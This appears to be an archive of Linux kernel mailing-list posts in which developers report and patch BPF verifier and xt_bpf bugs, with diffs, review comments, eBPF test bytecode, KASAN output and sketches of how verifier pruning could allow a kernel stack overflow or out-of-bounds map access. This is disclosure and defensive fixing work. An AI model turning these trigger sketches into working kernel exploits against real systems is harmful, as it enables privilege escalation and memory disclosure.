if (old->allocated_stack > cur->allocated_stack)
return false;

Note that if the old state had a smaller stack than the new state,
that is permitted because it is guaranteed that none of the extra
space in the new state will be used.

However, as far as I can tell, this can be used to smuggle a call
chain with a total stack size bigger than the permitted maximum
through the verifier, with code roughly as follows:

void b(void) {
  <use ~300 bytes of stack>
}
void main(void) {
  if (<some condition>) {
    <use ~300 bytes of stack>
  }
  b();
}

AFAICS, if the verifier first verifies the branch of main() where
<some condition> is false, it will go down into b, seeing a total stack
size of around 300 bytes. Afterwards, it will verify the branch of
main() where <some condition> is true, but the states will converge after
the branch, preventing the verifier from going down into b() again and
discovering through update_stack_depth() that actually, the total
stack size is around 600 bytes. From a coarse look, it seems like this
might be usable to overflow the kernel stack, which would be
exploitable on systems without vmapped stack?

And actually, you could probably even trigger it with something like
this, since the stack is always fully allocated on function entry:

void b(void) {
  <use ~300 bytes of stack>
}
void main(void) {
  b();
  <use ~300 bytes of stack>
}

So I think it might be necessary to do an extra pass for the stack
depth checking when all the stackframe sizes are known?
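
For illustration, such an extra pass could be a depth-first walk over the
call graph once each function's own frame size is known; the names and data
layout below are invented for the sketch, and recursion is assumed to be
rejected elsewhere so the walk terminates:

#define MAX_BPF_STACK 512
#define MAX_CALLEES   64            /* arbitrary bound for this sketch */

struct func_info {
    unsigned int frame_size;        /* stack bytes used by the function itself */
    int callees[MAX_CALLEES];       /* indices of directly called functions */
    int nr_callees;
};

/* Returns nonzero if some call chain starting at 'func' exceeds MAX_BPF_STACK. */
static int check_total_stack(const struct func_info *fi, int func,
                             unsigned int depth)
{
    int i;

    depth += fi[func].frame_size;
    if (depth > MAX_BPF_STACK)
        return -1;

    for (i = 0; i < fi[func].nr_callees; i++)
        if (check_total_stack(fi, fi[func].callees[i], depth))
            return -1;

    return 0;
}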


Re: [PATCH net 1/2] bpf/verifier: fix bounds calculation on BPF_RSH

2017-12-05 Thread Jann Horn
On Tue, Dec 5, 2017 at 8:15 PM, Edward Cree <ec...@solarflare.com> wrote:
> Incorrect signed bounds were being computed, although this had no effect
>  since the propagation in __reg_deduce_bounds() happened to overwrite them.
>
> Fixes: b03c9f9fdc37 ("bpf/verifier: track signed and unsigned min/max values")
> Reported-by: Jann Horn <ja...@google.com>
> Signed-off-by: Edward Cree <ec...@solarflare.com>
> ---
>  kernel/bpf/verifier.c | 30 --
>  1 file changed, 16 insertions(+), 14 deletions(-)
>
> diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
> index d4593571c404..5bed7f773c87 100644
> --- a/kernel/bpf/verifier.c
> +++ b/kernel/bpf/verifier.c
> @@ -2184,20 +2184,22 @@ static int adjust_scalar_min_max_vals(struct 
> bpf_verifier_env *env,
> mark_reg_unknown(env, regs, insn->dst_reg);
> break;
> }
> -   /* BPF_RSH is an unsigned shift, so make the appropriate 
> casts */
> -   if (dst_reg->smin_value < 0) {
> -   if (umin_val) {
> -   /* Sign bit will be cleared */
> -   dst_reg->smin_value = 0;
> -   } else {
> -   /* Lost sign bit information */
> -   dst_reg->smin_value = S64_MIN;
> -   dst_reg->smax_value = S64_MAX;
> -   }
> -   } else {
> -   dst_reg->smin_value =
> -   (u64)(dst_reg->smin_value) >> umax_val;
> -   }
> +   /* BPF_RSH is an unsigned shift.  If the value in dst_reg 
> might
> +* be negative, then either:
> +* 1) src_reg might be zero, so the sign bit of the result is
> +*unknown, so we lose our signed bounds
> +* 2) it's known negative, thus the unsigned bounds capture 
> the
> +*signed bounds
> +* 3) the signed bounds cross zero, so they tell us nothing
> +*about the result
> +* If the value in dst_reg is known nonnegative, then again 
> the
> +* unsigned bounts capture the signed bounds.
> +* Thus, in all cases it suffices to blow away our signed 
> bounds
> +* and rely on inferring new ones from the unsigned bounds and
> +* var_off of the result.
> +*/
> +   dst_reg->smin_value = S64_MIN;
> +   dst_reg->smax_value = S64_MAX;
> if (src_known)
> dst_reg->var_off = tnum_rshift(dst_reg->var_off,
>umin_val);
>

Reviewed-by: Jann Horn <ja...@google.com>


Re: BPF: bug without effect in BPF_RSH case of adjust_scalar_min_max_vals()

2017-12-04 Thread Jann Horn
On Mon, Dec 4, 2017 at 6:03 PM, Jann Horn <ja...@google.com> wrote:
> As far as I can tell, commit b03c9f9fdc37 ("bpf/verifier: track signed
> and unsigned min/max values") introduced the following effectless bug
> in the BPF_RSH case of adjust_scalar_min_max_vals() (unless that's
> intentional):
[...]
> ===
> BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
>
> BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP),
> BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack
> BPF_MOV32_IMM(BPF_REG_ARG2, 1),
> BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),
> BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),
> BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
> BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
> BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit
> BPF_EXIT_INSN(), // exit
> BPF_LDX_MEM(BPF_W, BPF_REG_3, BPF_REG_0, 0),
>
> BPF_ALU64_IMM(BPF_AND, BPF_REG_3, 0xf),
> BPF_MOV64_IMM(BPF_REG_1, -42),
> BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_3),
> BPF_MOV64_IMM(BPF_REG_2, 2),
> BPF_ALU64_REG(BPF_RSH, BPF_REG_1, BPF_REG_2),
> BPF_EXIT_INSN()
> ===

For using the eBPF bytecode in selftests:

Signed-off-by: Jann Horn <ja...@google.com>


BPF: bug without effect in BPF_RSH case of adjust_scalar_min_max_vals()

2017-12-04 Thread Jann Horn
As far as I can tell, commit b03c9f9fdc37 ("bpf/verifier: track signed
and unsigned min/max values") introduced the following effectless bug
in the BPF_RSH case of adjust_scalar_min_max_vals() (unless that's
intentional):

`dst_reg->smax_value` is only updated in the case where
`dst_reg->smin_value < 0` and `umin_val == 0`. This is obviously
harmless if `dst_reg->smax_value >= 0`, but if `dst_reg->smax_value <
0`, this will temporarily result in a state where the signed upper
bound of `dst_reg` is lower than the signed lower bound (which will be
set to 0). I don't think this should ever happen.

Luckily, this doesn't have any effect because of the
inter-representation information propagation that happens immediately
afterwards: __update_reg_bounds() neither modifies nor propagates the
incorrect `reg->smax_value` (the assignment is a no-op in this case),
then `__reg_deduce_bounds` takes the first branch and resets
`reg->smax_value` to `reg->umax_value`, which is correct.

To test this, I applied this patch to the kernel:

===
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index d4593571c404..bcf6a4aa25cd 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -2205,8 +2205,10 @@ static int adjust_scalar_min_max_vals(struct
bpf_verifier_env *env,
  dst_reg->var_off = tnum_rshift(tnum_unknown, umin_val);
  dst_reg->umin_value >>= umax_val;
  dst_reg->umax_value >>= umin_val;
+ pr_warn("BPF_RSH point A: smin=%lld, smax=%lld, umin=%llx,
umax=%llx, tribits=%llx, trimask=%llx\n", dst_reg->smin_value,
dst_reg->smax_value, dst_reg->umin_value, dst_reg->umax_value,
dst_reg->var_off.value, dst_reg->var_off.mask);
  /* We may learn something more from the var_off */
  __update_reg_bounds(dst_reg);
+ pr_warn("BPF_RSH point B: smin=%lld, smax=%lld, umin=%llx,
umax=%llx, tribits=%llx, trimask=%llx\n", dst_reg->smin_value,
dst_reg->smax_value, dst_reg->umin_value, dst_reg->umax_value,
dst_reg->var_off.value, dst_reg->var_off.mask);
  break;
  default:
  mark_reg_unknown(env, regs, insn->dst_reg);
@@ -2214,7 +2216,11 @@ static int adjust_scalar_min_max_vals(struct
bpf_verifier_env *env,
  }

  __reg_deduce_bounds(dst_reg);
+ if (opcode == BPF_RSH)
+ pr_warn("BPF_RSH point C: smin=%lld, smax=%lld, umin=%llx,
umax=%llx, tribits=%llx, trimask=%llx\n", dst_reg->smin_value,
dst_reg->smax_value, dst_reg->umin_value, dst_reg->umax_value,
dst_reg->var_off.value, dst_reg->var_off.mask);
  __reg_bound_offset(dst_reg);
+ if (opcode == BPF_RSH)
+ pr_warn("BPF_RSH point D: smin=%lld, smax=%lld, umin=%llx,
umax=%llx, tribits=%llx, trimask=%llx\n", dst_reg->smin_value,
dst_reg->smax_value, dst_reg->umin_value, dst_reg->umax_value,
dst_reg->var_off.value, dst_reg->var_off.mask);
  return 0;
 }
===

Then I attempted to load the following eBPF bytecode with verbosity level 2:

===
BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),

BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack
BPF_MOV32_IMM(BPF_REG_ARG2, 1),
BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),
BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),
BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit
BPF_EXIT_INSN(), // exit
BPF_LDX_MEM(BPF_W, BPF_REG_3, BPF_REG_0, 0),

BPF_ALU64_IMM(BPF_AND, BPF_REG_3, 0xf),
BPF_MOV64_IMM(BPF_REG_1, -42),
BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_3),
BPF_MOV64_IMM(BPF_REG_2, 2),
BPF_ALU64_REG(BPF_RSH, BPF_REG_1, BPF_REG_2),
BPF_EXIT_INSN()
===

dmesg output:

===
[  145.423122] BPF_RSH point A: smin=0, smax=-27,
umin=3ffffffffffffff5, umax=3ffffffffffffff9,
tribits=3ffffffffffffff0, trimask=f
[  145.423129] BPF_RSH point B: smin=4611686018427387888, smax=-27,
umin=3ffffffffffffff5, umax=3ffffffffffffff9,
tribits=3ffffffffffffff0, trimask=f
[  145.423133] BPF_RSH point C: smin=4611686018427387893,
smax=4611686018427387897, umin=3ffffffffffffff5,
umax=3ffffffffffffff9, tribits=3ffffffffffffff0, trimask=f
[  145.423136] BPF_RSH point D: smin=4611686018427387893,
smax=4611686018427387897, umin=3ffffffffffffff5,
umax=3ffffffffffffff9, tribits=3ffffffffffffff0, trimask=f
===


Re: [PATCH] netfilter: add overflow checks in xt_bpf.c

2017-11-30 Thread Jann Horn
On Fri, Dec 1, 2017 at 5:04 AM, Willem de Bruijn
<willemdebruijn.ker...@gmail.com> wrote:
> On Thu, Nov 30, 2017 at 7:46 PM, Jann Horn <ja...@google.com> wrote:
>> Check whether inputs from userspace are too long (explicit length field too
>> big or string not null-terminated) to avoid out-of-bounds reads.
>>
>> As far as I can tell, this can at worst lead to very limited kernel heap
>> memory disclosure or oopses.
>>
>> This bug can be triggered by an unprivileged user even if the xt_bpf module
>> is not loaded: iptables is available in network namespaces, and the xt_bpf
>> module can be autoloaded.
>>
>> Triggering the bug with a classic BPF filter with fake length 0x1000 causes
>> the following KASAN report:
>>
>> ==
>> BUG: KASAN: slab-out-of-bounds in bpf_prog_create+0x84/0xf0
>> Read of size 32768 at addr 8801eff2c494 by task test/4627
>>
>> CPU: 0 PID: 4627 Comm: test Not tainted 4.15.0-rc1+ #1
>> [...]
>> Call Trace:
>>  dump_stack+0x5c/0x85
>>  print_address_description+0x6a/0x260
>>  kasan_report+0x254/0x370
>>  ? bpf_prog_create+0x84/0xf0
>>  memcpy+0x1f/0x50
>>  bpf_prog_create+0x84/0xf0
>>  bpf_mt_check+0x90/0xd6 [xt_bpf]
>> [...]
>> Allocated by task 4627:
>>  kasan_kmalloc+0xa0/0xd0
>>  __kmalloc_node+0x47/0x60
>>  xt_alloc_table_info+0x41/0x70 [x_tables]
>> [...]
>> The buggy address belongs to the object at 8801eff2c3c0
>> which belongs to the cache kmalloc-2048 of size 2048
>> The buggy address is located 212 bytes inside of
>>     2048-byte region [8801eff2c3c0, 8801eff2cbc0)
>> [...]
>> ==
>>
>> Fixes: e6f30c731718 ("netfilter: x_tables: add xt_bpf match")
>> Signed-off-by: Jann Horn <ja...@google.com>
>> ---
>>  net/netfilter/xt_bpf.c | 6 ++
>>  1 file changed, 6 insertions(+)
>>
>> diff --git a/net/netfilter/xt_bpf.c b/net/netfilter/xt_bpf.c
>> index 041da0d9c06f..1f7fbd3c7e5a 100644
>> --- a/net/netfilter/xt_bpf.c
>> +++ b/net/netfilter/xt_bpf.c
>> @@ -27,6 +27,9 @@ static int __bpf_mt_check_bytecode(struct sock_filter 
>> *insns, __u16 len,
>>  {
>> struct sock_fprog_kern program;
>>
>> +   if (len > XT_BPF_MAX_NUM_INSTR)
>> +   return -EINVAL;
>> +
>> program.len = len;
>> program.filter = insns;
>
> Next, this calls bpf_prog_create, which calls bpf_check_basics_ok to verify 
> len.

Irrelevant:

 - see the KASAN splat in the commit message
 - bpf_check_basics_ok checks against BPF_MAXINSNS (4096), but a check
   against XT_BPF_MAX_NUM_INSTR (64) is needed because that's the size of
   the member in the input struct
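
For context, the userspace-supplied match info looks roughly like the
sketch below (abridged, not quoted verbatim from the uapi header); the
embedded array only holds 64 instructions, so a larger len has to be
rejected before bpf_prog_create() copies len * sizeof(struct sock_filter)
bytes out of it:

#define XT_BPF_MAX_NUM_INSTR 64

struct xt_bpf_info {
    __u16 bpf_program_num_elem;                            /* user-controlled */
    struct sock_filter bpf_program[XT_BPF_MAX_NUM_INSTR];  /* only 64 entries */

    /* only used in the kernel */
    struct bpf_prog *filter __attribute__((aligned(8)));
};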


[PATCH] netfilter: add overflow checks in xt_bpf.c

2017-11-30 Thread Jann Horn
Check whether inputs from userspace are too long (explicit length field too
big or string not null-terminated) to avoid out-of-bounds reads.

As far as I can tell, this can at worst lead to very limited kernel heap
memory disclosure or oopses.

This bug can be triggered by an unprivileged user even if the xt_bpf module
is not loaded: iptables is available in network namespaces, and the xt_bpf
module can be autoloaded.

Triggering the bug with a classic BPF filter with fake length 0x1000 causes
the following KASAN report:

==
BUG: KASAN: slab-out-of-bounds in bpf_prog_create+0x84/0xf0
Read of size 32768 at addr 8801eff2c494 by task test/4627

CPU: 0 PID: 4627 Comm: test Not tainted 4.15.0-rc1+ #1
[...]
Call Trace:
 dump_stack+0x5c/0x85
 print_address_description+0x6a/0x260
 kasan_report+0x254/0x370
 ? bpf_prog_create+0x84/0xf0
 memcpy+0x1f/0x50
 bpf_prog_create+0x84/0xf0
 bpf_mt_check+0x90/0xd6 [xt_bpf]
[...]
Allocated by task 4627:
 kasan_kmalloc+0xa0/0xd0
 __kmalloc_node+0x47/0x60
 xt_alloc_table_info+0x41/0x70 [x_tables]
[...]
The buggy address belongs to the object at 8801eff2c3c0
which belongs to the cache kmalloc-2048 of size 2048
The buggy address is located 212 bytes inside of
2048-byte region [8801eff2c3c0, 8801eff2cbc0)
[...]
==

Fixes: e6f30c731718 ("netfilter: x_tables: add xt_bpf match")
Signed-off-by: Jann Horn <ja...@google.com>
---
 net/netfilter/xt_bpf.c | 6 ++
 1 file changed, 6 insertions(+)

diff --git a/net/netfilter/xt_bpf.c b/net/netfilter/xt_bpf.c
index 041da0d9c06f..1f7fbd3c7e5a 100644
--- a/net/netfilter/xt_bpf.c
+++ b/net/netfilter/xt_bpf.c
@@ -27,6 +27,9 @@ static int __bpf_mt_check_bytecode(struct sock_filter *insns, 
__u16 len,
 {
struct sock_fprog_kern program;
 
+   if (len > XT_BPF_MAX_NUM_INSTR)
+   return -EINVAL;
+
program.len = len;
program.filter = insns;
 
@@ -55,6 +58,9 @@ static int __bpf_mt_check_path(const char *path, struct 
bpf_prog **ret)
mm_segment_t oldfs = get_fs();
int retval, fd;
 
+   if (strnlen(path, XT_BPF_PATH_MAX) == XT_BPF_PATH_MAX)
+   return -EINVAL;
+
set_fs(KERNEL_DS);
fd = bpf_obj_get_user(path, 0);
set_fs(oldfs);
-- 
2.15.0.531.g2ccb3012c9-goog



Re: [PATCH net] bpf: don't let ldimm64 leak map addresses on unprivileged

2017-05-07 Thread Jann Horn
On Mon, May 8, 2017 at 12:51 AM, Daniel Borkmann <dan...@iogearbox.net> wrote:
> On 05/08/2017 12:26 AM, Jann Horn wrote:
>>
>> On Mon, May 8, 2017 at 12:04 AM, Daniel Borkmann <dan...@iogearbox.net>
>> wrote:
>>>
>>> The patch fixes two things at once:
>>>
>>> 1) It checks the env->allow_ptr_leaks and only prints the map address to
>>> the log if we have the privileges to do so, otherwise it just dumps 0
>>> as we would when kptr_restrict is enabled on %pK. Given the latter is
>>> off by default and not every distro sets it, I don't want to rely on
>>> this, hence the 0 by default for unprivileged.
>>>
>>> 2) Printing of ldimm64 in the verifier log is currently broken in that
>>> we don't print the full immediate, but only the 32 bit part of the
>>> first insn part for ldimm64. Thus, fix this up as well; it's okay to
>>> access, since we verified all ldimm64 earlier already (including just
>>>     constants) through replace_map_fd_with_map_ptr().
>>>
>>> Fixes: cbd357008604 ("bpf: verifier (add ability to receive verification
>>> log)")
>>> Reported-by: Jann Horn <ja...@google.com>
>>> Signed-off-by: Daniel Borkmann <dan...@iogearbox.net>
>>
>> [...]
>>>
>>> @@ -362,9 +363,19 @@ static void print_bpf_insn(struct bpf_insn *insn)
>>>  insn->code,
>>>  bpf_ldst_string[BPF_SIZE(insn->code) >>
>>> 3],
>>>  insn->src_reg, insn->imm);
>>> -   } else if (BPF_MODE(insn->code) == BPF_IMM) {
>>> -   verbose("(%02x) r%d = 0x%x\n",
>>> -   insn->code, insn->dst_reg, insn->imm);
>>> +   } else if (BPF_MODE(insn->code) == BPF_IMM &&
>>> +  BPF_SIZE(insn->code) == BPF_DW) {
>>> +   /* At this point, we already made sure that the
>>> second
>>> +* part of the ldimm64 insn is accessible.
>>> +*/
>>> +   u64 imm = ((u64)(insn + 1)->imm << 32) |
>>> (u32)insn->imm;
>>> +   bool map_ptr = insn->src_reg ==
>>> BPF_PSEUDO_MAP_FD;
>>> +
>>> +   if (map_ptr && !env->allow_ptr_leaks)
>>> +   imm = 0;
>>> +
>>> +   verbose("(%02x) r%d = 0x%llx\n", insn->code,
>>> +   insn->dst_reg, (unsigned long long)imm);
>>>  } else {
>>>  verbose("BUG_ld_%02x\n", insn->code);
>>>  return;
>>
>>
>> You replaced the `BPF_MODE(insn->code) == BPF_IMM` branch with a
>> `BPF_MODE(insn->code) == BPF_IMM && BPF_SIZE(insn->code) == BPF_DW`
>> branch. Doesn't that break printing normal immediates?
>
>
> What do you mean by 'normal' immediates? You mean loads of imm into
> register, right? The ldimm64 is kind of special treated; for imms
> fitting into 32 bit, there is BPF_MOV64_IMM() and BPF_MOV32_IMM()
> otherwise.
>
> F.e. see the jumptable in __bpf_prog_run(), which is the interpreter.
> All BPF_LD instructions that we have are:
>
> static const void *jumptable[256] = {
>   [...]
>   [BPF_LD | BPF_ABS | BPF_W] = &_ABS_W,
>   [BPF_LD | BPF_ABS | BPF_H] = &_ABS_H,
>   [BPF_LD | BPF_ABS | BPF_B] = &_ABS_B,
>   [BPF_LD | BPF_IND | BPF_W] = &_IND_W,
>   [BPF_LD | BPF_IND | BPF_H] = &_IND_H,
>   [BPF_LD | BPF_IND | BPF_B] = &_IND_B,
>   [BPF_LD | BPF_IMM | BPF_DW] = &_IMM_DW,
> };
>
> In the print_bpf_insn() under class == BPF_LD, the BPF_ABS and BPF_IND
> are separately handled (load of packet data from skb), and the BPF_IMM
> is the one we're fixing, which only has BPF_DW as an option. I added it
> there since we really only want to see BPF_DW in this branch due to the
> double imm access.

Ah, right, I missed that. Nevermind.


Re: [PATCH net] bpf: don't let ldimm64 leak map addresses on unprivileged

2017-05-07 Thread Jann Horn
On Mon, May 8, 2017 at 12:04 AM, Daniel Borkmann <dan...@iogearbox.net> wrote:
> The patch fixes two things at once:
>
> 1) It checks the env->allow_ptr_leaks and only prints the map address to
>the log if we have the privileges to do so, otherwise it just dumps 0
>as we would when kptr_restrict is enabled on %pK. Given the latter is
>off by default and not every distro sets it, I don't want to rely on
>this, hence the 0 by default for unprivileged.
>
> 2) Printing of ldimm64 in the verifier log is currently broken in that
>we don't print the full immediate, but only the 32 bit part of the
>first insn part for ldimm64. Thus, fix this up as well; it's okay to
>access, since we verified all ldimm64 earlier already (including just
>constants) through replace_map_fd_with_map_ptr().
>
> Fixes: cbd357008604 ("bpf: verifier (add ability to receive verification 
> log)")
> Reported-by: Jann Horn <ja...@google.com>
> Signed-off-by: Daniel Borkmann <dan...@iogearbox.net>
[...]
> @@ -362,9 +363,19 @@ static void print_bpf_insn(struct bpf_insn *insn)
> insn->code,
> bpf_ldst_string[BPF_SIZE(insn->code) >> 3],
> insn->src_reg, insn->imm);
> -   } else if (BPF_MODE(insn->code) == BPF_IMM) {
> -   verbose("(%02x) r%d = 0x%x\n",
> -   insn->code, insn->dst_reg, insn->imm);
> +   } else if (BPF_MODE(insn->code) == BPF_IMM &&
> +  BPF_SIZE(insn->code) == BPF_DW) {
> +   /* At this point, we already made sure that the second
> +* part of the ldimm64 insn is accessible.
> +*/
> +   u64 imm = ((u64)(insn + 1)->imm << 32) | 
> (u32)insn->imm;
> +   bool map_ptr = insn->src_reg == BPF_PSEUDO_MAP_FD;
> +
> +   if (map_ptr && !env->allow_ptr_leaks)
> +   imm = 0;
> +
> +   verbose("(%02x) r%d = 0x%llx\n", insn->code,
> +   insn->dst_reg, (unsigned long long)imm);
> } else {
> verbose("BUG_ld_%02x\n", insn->code);
> return;

You replaced the `BPF_MODE(insn->code) == BPF_IMM` branch with a
`BPF_MODE(insn->code) == BPF_IMM && BPF_SIZE(insn->code) == BPF_DW`
branch. Doesn't that break printing normal immediates?


Re: [PATCH net][v2] bpf: fix range arithmetic for bpf map access

2016-11-16 Thread Jann Horn
On Wed, Nov 16, 2016 at 9:25 PM, Josef Bacik <jba...@fb.com> wrote:
> On 11/16/2016 01:41 PM, Jann Horn wrote:
>>
>> On Tue, Nov 15, 2016 at 3:20 PM, Josef Bacik <jba...@fb.com> wrote:
>>>
>>> On 11/15/2016 08:47 AM, Jann Horn wrote:
>>>>
>>>> In states_equal():
>>>> if (rold->type == NOT_INIT ||
>>>>(rold->type == UNKNOWN_VALUE && rcur->type != NOT_INIT))
>>>> <
>>>> continue;
>>>>
>>>> I think this is broken in code like the following:
>>>>
>>>> int value;
>>>> if (condition) {
>>>>   value = 1; // visited first by verifier
>>>> } else {
>>>>   value = 100; // visited second by verifier
>>>> }
>>>> int dummy = 1; // states seem to converge here, but actually don't
>>>> map[value] = 1234;
>>>>
>>>> `value` would be an UNKNOWN_VALUE for both paths, right? So
>>>> states_equal() would decide that the states converge after the
>>>> conditionally executed code?
>>>>
>>>
>>> Value would be CONST_IMM for both paths, and wouldn't match so they
>>> wouldn't
>>> converge.  I think I understood your question right, let me know if I'm
>>> addressing the wrong part of it.
>>
>>
>> Okay, true, but what if you load the values from a map and bounds-check
>> them
>> instead of hardcoding them? Then they will be of type UNKNOWN_VALUE,
>> right?
>> Like this:
>>
>> int value = map[0];
>> if (condition) {
>>   value &= 0x1; // visited first by verifier
>> } else {
>>   // nothing; visited second by verifier
>> }
>> int dummy = 1; // states seem to converge here, but actually don't
>> map[value] = 1234;
>>
>> And then `rold->type == UNKNOWN_VALUE && rcur->type != NOT_INIT` will be
>> true in the `dummy = 1` line, and the states converge. Am I missing
>> something?
>>
>
> Ah ok yeah I see it now you are right.  This is slightly different from this
> particular problem so I'll send a second patch to address this, sound
> reasonable?  Thanks,

Sure, makes sense.


Re: [PATCH net][v2] bpf: fix range arithmetic for bpf map access

2016-11-16 Thread Jann Horn
On Tue, Nov 15, 2016 at 3:20 PM, Josef Bacik <jba...@fb.com> wrote:
> On 11/15/2016 08:47 AM, Jann Horn wrote:
>> In states_equal():
>> if (rold->type == NOT_INIT ||
>>(rold->type == UNKNOWN_VALUE && rcur->type != NOT_INIT))
>> <
>> continue;
>>
>> I think this is broken in code like the following:
>>
>> int value;
>> if (condition) {
>>   value = 1; // visited first by verifier
>> } else {
>>   value = 100; // visited second by verifier
>> }
>> int dummy = 1; // states seem to converge here, but actually don't
>> map[value] = 1234;
>>
>> `value` would be an UNKNOWN_VALUE for both paths, right? So
>> states_equal() would decide that the states converge after the
>> conditionally executed code?
>>
>
> Value would be CONST_IMM for both paths, and wouldn't match so they wouldn't
> converge.  I think I understood your question right, let me know if I'm
> addressing the wrong part of it.

Okay, true, but what if you load the values from a map and bounds-check them
instead of hardcoding them? Then they will be of type UNKNOWN_VALUE, right?
Like this:

int value = map[0];
if (condition) {
  value &= 0x1; // visited first by verifier
} else {
  // nothing; visited second by verifier
}
int dummy = 1; // states seem to converge here, but actually don't
map[value] = 1234;

And then `rold->type == UNKNOWN_VALUE && rcur->type != NOT_INIT` will be
true in the `dummy = 1` line, and the states converge. Am I missing something?


Re: [PATCH net][v2] bpf: fix range arithmetic for bpf map access

2016-11-15 Thread Jann Horn
On Tue, Nov 15, 2016 at 4:10 AM, Alexei Starovoitov
<alexei.starovoi...@gmail.com> wrote:
> On Mon, Nov 14, 2016 at 03:45:36PM -0500, Josef Bacik wrote:
>> I made some invalid assumptions with BPF_AND and BPF_MOD that could result in
>> invalid accesses to bpf map entries.  Fix this up by doing a few things
>>
>> 1) Kill BPF_MOD support.  This doesn't actually get used by the compiler in 
>> real
>> life and just adds extra complexity.
>>
>> 2) Fix the logic for BPF_AND, don't allow AND of negative numbers and set the
>> minimum value to 0 for positive AND's.
>>
>> 3) Don't do operations on the ranges if they are set to the limits, as they 
>> are
>> by definition undefined, and allowing arithmetic operations on those values
>> could make them appear valid when they really aren't.
>>
>> This fixes the testcase provided by Jann as well as a few other theoretical
>> problems.
>>
>> Reported-by: Jann Horn <ja...@google.com>
>> Signed-off-by: Josef Bacik <jba...@fb.com>
>
> lgtm.
> Acked-by: Alexei Starovoitov <a...@kernel.org>
>
> Jann, could you please double check the logic.
> Thanks!

I found some more potential issues, maybe Josef and you can tell me whether I
understood these correctly.


/* If the source register is a random pointer then the
* min_value/max_value values represent the range of the known
* accesses into that value, not the actual min/max value of the
* register itself.  In this case we have to reset the reg range
* values so we know it is not safe to look at.
*/
if (regs[insn->src_reg].type != CONST_IMM &&
   regs[insn->src_reg].type != UNKNOWN_VALUE) {
min_val = BPF_REGISTER_MIN_RANGE;
max_val = BPF_REGISTER_MAX_RANGE;
}

Why only the source register? Why not the destination register?


/* We don't know anything about what was done to this register, mark it
* as unknown.
*/
if (min_val == BPF_REGISTER_MIN_RANGE &&
   max_val == BPF_REGISTER_MAX_RANGE) {
reset_reg_range_values(regs, insn->dst_reg);
return;
}

Why have this special case at all? Since min_val and max_val are
basically independent, this code shouldn't be necessary, right?


static void check_reg_overflow(struct bpf_reg_state *reg)
{
if (reg->max_value > BPF_REGISTER_MAX_RANGE)
reg->max_value = BPF_REGISTER_MAX_RANGE;
if (reg->min_value < BPF_REGISTER_MIN_RANGE ||
   reg->min_value > BPF_REGISTER_MAX_RANGE)
reg->min_value = BPF_REGISTER_MIN_RANGE;
}

Why is this asymmetric? Why is `reg->max_value <
BPF_REGISTER_MIN_RANGE` not important, but `reg->min_value >
BPF_REGISTER_MAX_RANGE` is?


In states_equal():
if (rold->type == NOT_INIT ||
   (rold->type == UNKNOWN_VALUE && rcur->type != NOT_INIT))   <
continue;

I think this is broken in code like the following:

int value;
if (condition) {
  value = 1; // visited first by verifier
} else {
  value = 100; // visited second by verifier
}
int dummy = 1; // states seem to converge here, but actually don't
map[value] = 1234;

`value` would be an UNKNOWN_VALUE for both paths, right? So
states_equal() would decide that the states converge after the
conditionally executed code?


Re: [PATCH] bpf: fix range arithmetic for bpf map access

2016-11-11 Thread Jann Horn
On Fri, Nov 11, 2016 at 1:18 AM, Josef Bacik <jba...@fb.com> wrote:
> ---
> Sorry Jann, I saw your response last night and then promptly forgot about it,
> here's the git-send-email version.
> ---

A note: This doesn't seem to apply cleanly to current net-next (or I'm too
stupid to use "git am"), so I'm applying it on
f41cd11d64b2b21012eb4abffbe579bc0b90467f, which is net-next from a few days
ago.


> I made some invalid assumptions with BPF_AND and BPF_MOD that could result in
> invalid accesses to bpf map entries.  Fix this up by doing a few things
>
> 1) Kill BPF_MOD support.  This doesn't actually get used by the compiler in 
> real
> life and just adds extra complexity.

Yay! As a security person, I am very much in favor of killing unused features.


> 2) Fix the logic for BPF_AND.  If the min value is negative then that is the 
> new
> minimum, otherwise it is unconditionally 0.
>
> 3) Don't do operations on the ranges if they are set to the limits, as they 
> are
> by definition undefined, and allowing arithmetic operations on those values
> could make them appear valid when they really aren't.
>
> This fixes the testcase provided by Jann as well as a few other theoretical
> problems.
>
> Reported-by: Jann Horn <ja...@google.com>
> Signed-off-by: Josef Bacik <jba...@fb.com>

A nit: check_mem_access() still has an explicit cast of reg->min_value to s64, I
think that's not necessary anymore?

> case BPF_AND:
> -   /* & is special since it could end up with 0 bits set. */
> -   dst_reg->min_value &= min_val;
> +   /* & is special since it's could be any value within our 
> range,
> +* including 0.  But if the thing we're AND'ing against is
> +* negative and we're negative then that's the minimum value,
> +* otherwise the minimum will always be 0.
> +*/
> +   if (min_val < 0 && dst_reg->min_value < 0)
> +   dst_reg->min_value = min_t(s64, dst_reg->min_value,
> +  min_val);
> +   else
> +   dst_reg->min_value = 0;
> dst_reg->max_value = max_val;

I'm not sure whether this is correct when dealing with signed numbers.
Let's say I have -2 and -3 (as u32: 0xfffffffe and 0xfffffffd) and AND them
together. The result is 0xfffffffc, or -4, right? So if I just compute
the AND of
constant numbers -2 and -3 (known to the verifier), the verifier would
compute minimum -3 while the actual value is -4, right?

If I am correct about this, I think it might make sense to just reset
the state to
unknown in the `min_val < 0 && dst_reg->min_value < 0` case. That shouldn't
occur in legitimate programs, right?
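
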